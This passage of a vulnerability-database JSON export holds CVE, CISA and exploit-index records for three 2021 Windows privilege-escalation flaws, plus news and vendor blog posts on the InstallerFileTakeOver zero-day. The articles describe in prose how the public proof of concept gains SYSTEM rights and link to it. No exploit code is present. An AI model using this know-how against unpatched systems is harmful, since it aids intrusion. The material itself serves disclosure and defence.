"cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:44:41", "description": "Windows Installer Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-10T01:19:00", "type": "cve", "title": "CVE-2021-41379", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2021-11-12T20:17:00", "cpe": ["cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:20h2"], "id": "CVE-2021-41379", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-41379", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:30:33", "description": "Windows User Profile Service Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T18:15:00", "type": "cve", "title": "CVE-2021-34484", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2021-08-23T20:25:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-34484", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-34484", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}], "prion": [{"lastseen": "2023-08-16T02:11:09", "description": "Windows Mobile Device Management Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-02-25T23:15:00", "type": "prion", "title": "CVE-2021-24084", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084"], "modified": "2022-06-28T14:11:00", "id": "PRION:CVE-2021-24084", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-24084", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-08-16T07:18:22", "description": "Windows Installer Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-10T01:19:00", "type": "prion", "title": "CVE-2021-41379", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2023-08-08T14:21:00", "id": "PRION:CVE-2021-41379", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-41379", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T05:58:16", "description": "Windows User Profile Service Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T18:15:00", "type": "prion", "title": "CVE-2021-34484", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2021-08-23T20:25:00", "id": "PRION:CVE-2021-34484", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-34484", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2023-09-28T15:02:03", "description": "<h1 align=\"center\">WindowsMDM-LPE-0Day</h1>\n<i><h3 align=\"center...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-28T09:48:36", "type": "githubexploit", "title": "Exploit for Link Following in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084"], "modified": "2023-09-28T11:33:35", "id": "291894F9-38D4-5877-8B8F-EF46C6D23B82", "href": "", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-10T14:59:52", "description": "# WindowsMDMLPE\n\nDemo : ht...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-11-27T00:37:07", "type": "githubexploit", "title": "Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084"], "modified": "2022-02-10T13:34:38", "id": "3AA8003E-06D3-57B2-BB7E-43616295A4B7", "href": "", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-20T21:38:55", "description": "# shakeitoff\r\n\r\nA smaller, minimized, and cleaner version of [In...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-02T19:15:59", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379", "CVE-2021-43883"], "modified": "2022-03-20T15:46:42", "id": "DF9C9272-7F4D-5362-A6BF-18A60A5E907D", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Microsoft Windows Installer contains an unspecified vulnerability which allows for privilege escalation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Installer Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2022-03-03T00:00:00", "id": "CISA-KEV-CVE-2021-41379", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Microsoft Windows User Profile Service contains an unspecified vulnerability which allows for privilege escalation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows User Profile Service Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2022-03-31T00:00:00", "id": "CISA-KEV-CVE-2021-34484", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:38:04", "description": "[![](https://thehackernews.com/new-images/img/a/AVvXsEixE9g-lXbfi04ffXtXrVqyoSpB_rf6Xn-3UD4qDKdyKWD2TaCbvUtbUMmIbDUiMA3xnT8OdE411V7_fx1D1kuieTuYdHoVsC1SoBl69hpqZkwOnyA6NrQdijQkPLyKGgpd3Umvvds1Cw76DTRtk-jYcUcMS7l6HHe68rkzx4pI16PGnMHYxy04yi1U)](<https://thehackernews.com/new-images/img/a/AVvXsEixE9g-lXbfi04ffXtXrVqyoSpB_rf6Xn-3UD4qDKdyKWD2TaCbvUtbUMmIbDUiMA3xnT8OdE411V7_fx1D1kuieTuYdHoVsC1SoBl69hpqZkwOnyA6NrQdijQkPLyKGgpd3Umvvds1Cw76DTRtk-jYcUcMS7l6HHe68rkzx4pI16PGnMHYxy04yi1U>)\n\nAttackers are actively making efforts to exploit a new variant of a recently disclosed privilege escalation vulnerability to potentially execute arbitrary code on fully-patched systems, once again demonstrating how adversaries move quickly to weaponize a publicly available exploit.\n\nCisco Talos [disclosed](<https://blog.talosintelligence.com/2021/11/attackers-exploiting-zero-day.html>) that it \"detected malware samples in the wild that are attempting to take advantage of this vulnerability.\"\n\nTracked as [CVE-2021-41379](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>) and discovered by security researcher Abdelhamid Naceri, the elevation of privilege flaw affecting the Windows Installer software component was originally resolved as part of Microsoft's [Patch Tuesday updates](<https://thehackernews.com/2021/11/microsoft-issues-patches-for-actively.html>) for November 2021.\n\nHowever, in what's a case of an insufficient patch, Naceri found that it was not only possible to bypass the fix implemented by Microsoft but also [achieve](<https://twitter.com/wdormann/status/1462607586272976901>) local privilege escalation via a newly discovered zero-day bug.\n\n[![](https://thehackernews.com/new-images/img/a/AVvXsEgAfxkfmkohSpEjMhQZH5LNqwQ1pen7O9L6K2QMRFBjQt_93j5vdXaqk25vj1EgZFyrSPMKMbPL_H_4wzzfmo8AD1z11O900nY3rqYMjhBmVpXrXb-PnYDbp3RrkfeTpctYgyD4wSlXli4azzDxKLTfqLL2Qqs-uPTjf7HbPXJTwIniEqWf1DChqwZW)](<https://thehackernews.com/new-images/img/a/AVvXsEgAfxkfmkohSpEjMhQZH5LNqwQ1pen7O9L6K2QMRFBjQt_93j5vdXaqk25vj1EgZFyrSPMKMbPL_H_4wzzfmo8AD1z11O900nY3rqYMjhBmVpXrXb-PnYDbp3RrkfeTpctYgyD4wSlXli4azzDxKLTfqLL2Qqs-uPTjf7HbPXJTwIniEqWf1DChqwZW>)\n\nThe proof-of-concept (PoC) exploit, dubbed \"[InstallerFileTakeOver](<https://github.com/klinix5/InstallerFileTakeOver>),\" works by overwriting the discretionary access control list ([DACL](<https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists>)) for Microsoft Edge Elevation Service to replace any executable file on the system with an MSI installer file, allowing an attacker to run code with SYSTEM privileges.\n\nAn attacker with admin privileges could then abuse the access to gain full control over the compromised system, including the ability to download additional software, and modify, delete, or exfiltrate sensitive information stored in the machine.\n\n\"Can confirm this works, local priv esc. Tested on Windows 10 20H2 and Windows 11. The prior patch MS issued didn't fix the issue properly,\" [tweeted](<https://twitter.com/GossiTheDog/status/1462721449425264645>) security researcher Kevin Beaumont, corroborating the findings.\n\nNaceri noted that the latest variant of CVE-2021-41379 is \"more powerful than the original one,\" and that the best course of action would be to wait for Microsoft to release a security patch for the problem \"due to the complexity of this vulnerability.\"\n\n\"We are aware of the disclosure and will do what is necessary to keep our customers safe and protected,\" a Microsoft spokesperson told The Hacker News via email. \"An attacker using the methods described must already have access and the ability to run code on a target victim's machine.\"\n\n**_Update:_** 0patch has issued a free micropatch to remediate the \"InstallerFileTakeOver\" zero-day flaw in Windows Installer component that could be abused by a local unprivileged user to overwrite an existing system executable and then arbitrarily change its contents to gain SYSTEM permissions.\n\n\"It doesn't take a lot of imagination to see that taking over an executable file that is being used by a privileged process can get one's code executed with such process' privileges,\" 0patch's Mitja Kolsek [said](<https://blog.0patch.com/2021/12/free-micropatches-for.html>) in a write-up published Thursday.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-25T08:10:00", "type": "thn", "title": "Warning \u2014 Hackers Exploiting New Windows Installer Zero-Day Exploit in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2021-12-03T03:42:18", "id": "THN:48C46A645A455217EADCA99ECBFB18B8", "href": "https://thehackernews.com/2021/11/warning-hackers-exploiting-new-windows.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2021-11-26T18:36:46", "description": "Sometimes the ways in which malicious code gets in the hands of cybercriminals is frustrating for those in the industry, and incomprehensible to those on the outside.\n\nA quick summary of the events in the history of this exploit:\n\n * A researcher found a flaw in Windows Installer that would allow an attacker to delete targeted files on an affected system with elevated privileges.\n * Microsoft patched the vulnerability in November\u2019s Patch Tuesday update.\n * The researcher found a way to circumvent the patch and this time decided not to engage in responsible disclosure because he got frustrated with Microsoft\u2019s bug bounty program.\n * The researcher\u2019s PoC is being tested in the wild and cybercriminals could be preparing the first real attacks exploiting this vulnerability.\n\nLet's have a look at what is going on and how it came to this.\n\n### The vulnerability\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\nThe vulnerability in question was listed as [CVE-2021-41379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41379>) and is a local Windows Installer Elevation of Privilege (EoP) vulnerability. If successfully exploited, the bypass could give attackers SYSTEM privileges on up-to-date devices running the latest Windows releases, including Windows 10, Windows 11, and Windows Server 2022.\n\nBy exploiting this zero-day, threat actors that already have limited access to compromised systems can elevate their privileges and use these privileges to spread laterally within a target network.\n\n### The patch\n\nMicrosoft patched the vulnerability in the [November Patch Tuesday updates](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/11/patch-now-microsoft-plugs-actively-exploited-zero-days-and-other-updates/>). But according to the researcher, the bug was not fixed correctly. He discovered a new variant during the analysis of the CVE-2021-41379 patch.\n\nWith the new variant, an attacker will be able to run programs with a higher privilege than they are entitled to. To be clear, an attacker using the new variant must already have access and the ability to run code on a target victim's machine, but now they can run the code with SYSTEM privileges thanks to the exploit.\n\n### The frustration\n\nThe researcher appears to have been so disappointed in Microsoft after he responsibly disclosed the vulnerability by means of the [Trend Micro zero-day initiative](<https://www.zerodayinitiative.com>), that he decided to skip that path altogether when he found the new method to bypass the patch. The researcher published a new version of the proof of concept (PoC) exploit, which is even more powerful than the original exploit.\n\nApparently the main reason for his frustration was the reward level.\n\n\u201c\u201cMicrosoft\u2019s rewards have been very bad since April 2020; the community wouldn\u2019t make these kinds of decisions if Microsoft took its rewards seriously.\u201d\n\n### In the wild\n\nSeveral security vendors have noticed malware samples in the wild that are attempting to take advantage of this vulnerability. A quick search on VirusTotal showed dozens of different files that tried to do this. This may be some threat actors testing the exploit code to turn it into something they can use in their attacks, along with some researchers trying out different ways to use and stop the exploit. It is worrying nonetheless to see once again how quick attackers are able to weaponize publicly available exploit code.\n\n### Mitigation\n\nThe researcher recommends users wait for Microsoft to release a security patch, due to the complexity of this vulnerability, although he doesn\u2019t seem confident that Microsoft will get it right this time.\n\n"Any attempt to patch the binary directly will break windows installer. So you better wait and see how Microsoft will screw the patch again."\n\nMicrosoft says it is working on it. In the meantime, Malwarebytes Premium and business users are protected, because our programs detect the files using this vulnerability as Exploit.Agent.\n\n![detection of exploit](https://blog.malwarebytes.com/wp-content/uploads/2021/11/detection-1.png)Malwarebytes detects and stops the exploit\n\nStay safe, everyone!\n\nThe post [Windows Installer vulnerability becomes actively exploited zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/11/windows-installer-vulnerability-becomes-actively-exploited-zero-day/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-24T14:21:50", "type": "malwarebytes", "title": "Windows Installer vulnerability becomes actively exploited zero-day", "bulletinFamily": "blog", "cvss2": 